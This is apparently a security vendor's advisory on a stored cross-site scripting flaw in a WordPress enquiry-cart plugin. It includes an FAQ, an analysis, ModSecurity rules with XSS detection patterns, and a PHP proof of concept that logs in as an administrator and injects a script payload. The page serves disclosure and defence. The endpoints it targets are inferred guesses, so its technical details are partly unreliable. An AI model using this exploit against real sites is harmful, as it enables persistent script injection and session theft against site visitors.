What is CVE-2026-2838?

CVE-2026-2838 is a stored cross-site scripting (XSS) vulnerability in the Whole Enquiry Cart for WooCommerce plugin for WordPress, affecting versions up to 1.2.1. It allows authenticated users with administrator-level access to inject malicious scripts via the ‘woowhole_success_msg’ parameter.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of the ‘woowhole_success_msg’ parameter. An attacker can save a script in this parameter, which will execute whenever a user accesses a page displaying the message.

Who is affected by this vulnerability?

Only installations of the Whole Enquiry Cart for WooCommerce plugin version 1.2.1 or earlier are affected. Specifically, it impacts multi-site installations or those with the unfiltered_html capability disabled.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the plugin version in your WordPress admin panel. If it is version 1.2.1 or earlier, and if you have administrator-level access, your site may be at risk.

What is the CVSS score and what does it mean?

CVE-2026-2838 has a CVSS score of 4.4, indicating a medium severity level. This score reflects the high privileges required for exploitation and the specific conditions under which the vulnerability can be exploited.

How can I fix this vulnerability?

To fix this vulnerability, update the Whole Enquiry Cart for WooCommerce plugin to the latest version. Additionally, ensure that input sanitization is applied to the ‘woowhole_success_msg’ parameter and that output escaping is used when rendering this message.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can lead to arbitrary JavaScript execution in the context of any user visiting the affected page. This could result in session hijacking, credential theft, or redirection to malicious sites.

What is the proof of concept for this vulnerability?

The proof of concept involves an attacker logging in as an administrator and sending a POST request to the plugin’s settings page with a malicious script in the ‘woowhole_success_msg’ parameter. This demonstrates how the vulnerability can be exploited to store and execute scripts.

What are the recommended security practices to prevent such vulnerabilities?

To prevent vulnerabilities like CVE-2026-2838, always keep plugins updated, apply proper input validation and output escaping, and follow the principle of least privilege for user roles. Regular security audits can also help identify potential issues.

Is this vulnerability present in all versions of the plugin?

No, CVE-2026-2838 specifically affects versions of the Whole Enquiry Cart for WooCommerce plugin up to and including 1.2.1. Versions released after this may have addressed the issue.

How can I stay informed about vulnerabilities like CVE-2026-2838?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow relevant security blogs, and monitor the National Vulnerability Database (NVD) or the Common Vulnerabilities and Exposures (CVE) database.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the plugin temporarily or restrict access to the plugin settings to trusted administrators only. Additionally, review user roles and permissions to minimize exposure.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-2838: Whole Enquiry Cart for WooCommerce <= 1.2.1 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'woowhole_success_msg' Parameter (whole-cart-enquiry)

CVE ID CVE-2026-2838

Plugin whole-cart-enquiry

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 1.2.1

Patched Version —

Disclosed April 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2838 (metadata-based): This vulnerability allows authenticated attackers with administrator-level access to inject stored cross-site scripting (XSS) via the ‘woowhole_success_msg’ parameter in the Whole Enquiry Cart for WooCommerce plugin version 1.2.1 and earlier. The CVSS score of 4.4 indicates medium severity with a vector of AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N, reflecting the high privileges required and the context-dependent nature of the attack.

Root Cause: The CWE-79 classification and the description point to insufficient input sanitization and output escaping on the ‘woowhole_success_msg’ parameter. The plugin likely saves this parameter in the database via an admin settings page or an AJAX handler without properly sanitizing user input (e.g., using wp_kses_post or sanitize_text_field) and then outputs it elsewhere (e.g., a success notice or cart page) without escaping (e.g., using esc_html or wp_kses). This is a classic pattern for stored XSS in WordPress admin settings or plugin output hooks. Since no code diff is available, Atomic Edge analysis infers the vulnerable mechanism from the CWE and the parameter name; the parameter likely stores a customizable success message that the plugin outputs unsanitized.

Exploitation: An attacker with administrator-level access must first have the unfiltered_html capability disabled (typical on multi-site installations or sites with restricted roles). The attacker then sends a POST request to the plugin’s admin settings page or AJAX endpoint (likely /wp-admin/admin-ajax.php with an action like ‘woowhole_save_settings’ or the plugin’s settings page URL) with the ‘woowhole_success_msg’ parameter containing a JavaScript payload, for example: alert(‘XSS’);. The plugin stores this payload in the database. When a user (including lower-privileged users or visitors) accesses the page where the message is displayed (e.g., the enquiry cart page), the script executes in their browser. The attack requires high privileges to trigger the stored payload, but the execution affects any user viewing the impacted page.

Remediation: The plugin must apply proper input sanitization before saving the ‘woowhole_success_msg’ parameter. Using WordPress’s wp_kses_post() to allow only safe HTML tags or sanitize_text_field() to strip all HTML tags would prevent XSS. Additionally, the plugin must escape the output when rendering the message. Using esc_html() or wp_kses() on the stored value before echoing it will neutralize any injected scripts. The patch should be applied in the settings save handler and in the output template or hook where the message is displayed.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of any user visiting the page that displays the stored message. This can lead to session theft, credential harvesting, defacement, or redirecting users to malicious sites. Although the CVSS score is low due to the high privilege requirement and complex attack conditions, the stored nature of the XSS means the impact persists until the malicious input is removed.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2838 (metadata-based)
# Blocks stored XSS in the woowhole_success_msg parameter for the Whole Enquiry Cart for WooCommerce plugin.
# Targets the likely AJAX action and the plugin settings page POST requests.

# Rule 1: Block XSS payload in AJAX request to woowhole_save_settings
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20262838,phase:2,deny,status:403,chain,msg:'CVE-2026-2838 - XSS via woowhole_success_msg in AJAX',severity:'CRITICAL',tag:'CVE-2026-2838'"
  SecRule ARGS_POST:action "@streq woowhole_save_settings" "chain"
    SecRule ARGS_POST:woowhole_success_msg "@rx <script|<img.*onerror|<svg.*onload|<iframe|onmouseover|onclick|javascript:" 
      "t:lowercase,t:urlDecode"

# Rule 2: Block XSS payload in direct POST to plugin settings page (inferred slug: woowhole-settings)
SecRule REQUEST_URI "@rx ^/wp-admin/admin.php?page=woowhole-settings" 
  "id:20262839,phase:2,deny,status:403,chain,msg:'CVE-2026-2838 - XSS via woowhole_success_msg in settings page',severity:'CRITICAL',tag:'CVE-2026-2838'"
  SecRule ARGS_POST:woowhole_success_msg "@rx <script|<img.*onerror|<svg.*onload|<iframe|onmouseover|onclick|javascript:" 
    "t:lowercase,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2838 - Whole Enquiry Cart for WooCommerce <= 1.2.1 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'woowhole_success_msg' Parameter

// Configuration: Set these variables before running the script.
$target_url = 'http://example.com'; // Change to the WordPress target URL
$admin_username = 'admin';          // Administrator username
$admin_password = 'password';       // Administrator password

// Step 1: Authenticate as administrator
$login_url = $target_url . '/wp-login.php';
$login_post_data = array(
    'log' => $admin_username,
    'pwd' => $admin_password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_post_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

// Check if login succeeded (basic check: look for dashboard text)
if (strpos($response, 'wp-admin') === false && strpos($response, 'dashboard') === false) {
    die('[!] Login failed. Check credentials or target URL.');
}

echo '[+] Login successful.n';

// Step 2: Inject XSS payload via the woowhole_success_msg parameter
// The parameter is likely saved via an AJAX action (e.g., 'woowhole_save_settings') or via a POST to the plugin's settings page.
// We test both common patterns.

// XSS payload: simple JavaScript alert to demonstrate execution
$xss_payload = '<script>alert("CVE-2026-2838 XSS");</script>';

// Attempt 1: AJAX endpoint (common for plugin settings)
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ajax_post_data = array(
    'action' => 'woowhole_save_settings', // Inferred plugin AJAX action
    'woowhole_success_msg' => $xss_payload
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo '[+] AJAX response code: ' . $http_code . "n";
if (strpos($ajax_response, 'success') !== false || $http_code == 200) {
    echo '[+] Payload likely saved via AJAX. Check the page where the success message is displayed.n';
} else {
    // Attempt 2: Direct POST to plugin settings page (if AJAX fails)
    $settings_url = $target_url . '/wp-admin/admin.php?page=woowhole-settings'; // Inferred plugin page slug
    $settings_post_data = array(
        'woowhole_success_msg' => $xss_payload,
        'submit_settings' => 'Save'  // Common submit button name
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $settings_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($settings_post_data));
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $settings_response = curl_exec($ch);
    $http_code2 = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    echo '[+] Settings page response code: ' . $http_code2 . "n";
    if (strpos($settings_response, 'settings saved') !== false || $http_code2 == 200) {
        echo '[+] Payload likely saved via settings page. Check the page where the success message is displayed.n';
    } else {
        echo '[!] Could not confirm payload injection. The plugin endpoint may differ.n';
    }
}

Frequently Asked Questions

What is CVE-2026-2838?
Overview of the vulnerability
CVE-2026-2838 is a stored cross-site scripting (XSS) vulnerability in the Whole Enquiry Cart for WooCommerce plugin for WordPress, affecting versions up to 1.2.1. It allows authenticated users with administrator-level access to inject malicious scripts via the ‘woowhole_success_msg’ parameter.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of the ‘woowhole_success_msg’ parameter. An attacker can save a script in this parameter, which will execute whenever a user accesses a page displaying the message.
Who is affected by this vulnerability?
Identifying at-risk installations
Only installations of the Whole Enquiry Cart for WooCommerce plugin version 1.2.1 or earlier are affected. Specifically, it impacts multi-site installations or those with the unfiltered_html capability disabled.
How can I check if my site is vulnerable?
Steps for verification
To determine if your site is vulnerable, check the plugin version in your WordPress admin panel. If it is version 1.2.1 or earlier, and if you have administrator-level access, your site may be at risk.
What is the CVSS score and what does it mean?
Understanding severity ratings
CVE-2026-2838 has a CVSS score of 4.4, indicating a medium severity level. This score reflects the high privileges required for exploitation and the specific conditions under which the vulnerability can be exploited.
How can I fix this vulnerability?
Mitigation steps
To fix this vulnerability, update the Whole Enquiry Cart for WooCommerce plugin to the latest version. Additionally, ensure that input sanitization is applied to the ‘woowhole_success_msg’ parameter and that output escaping is used when rendering this message.
What are the practical risks of this vulnerability?
Potential impacts of exploitation
If exploited, this vulnerability can lead to arbitrary JavaScript execution in the context of any user visiting the affected page. This could result in session hijacking, credential theft, or redirection to malicious sites.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept involves an attacker logging in as an administrator and sending a POST request to the plugin’s settings page with a malicious script in the ‘woowhole_success_msg’ parameter. This demonstrates how the vulnerability can be exploited to store and execute scripts.
What are the recommended security practices to prevent such vulnerabilities?
Best practices for WordPress security
To prevent vulnerabilities like CVE-2026-2838, always keep plugins updated, apply proper input validation and output escaping, and follow the principle of least privilege for user roles. Regular security audits can also help identify potential issues.
Is this vulnerability present in all versions of the plugin?
Version-specific details
No, CVE-2026-2838 specifically affects versions of the Whole Enquiry Cart for WooCommerce plugin up to and including 1.2.1. Versions released after this may have addressed the issue.
How can I stay informed about vulnerabilities like CVE-2026-2838?
Keeping updated on security issues
To stay informed about vulnerabilities, subscribe to security mailing lists, follow relevant security blogs, and monitor the National Vulnerability Database (NVD) or the Common Vulnerabilities and Exposures (CVE) database.
What should I do if I cannot update the plugin immediately?
Interim measures
If you cannot update the plugin immediately, consider disabling the plugin temporarily or restrict access to the plugin settings to trusted administrators only. Additionally, review user roles and permissions to minimize exposure.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations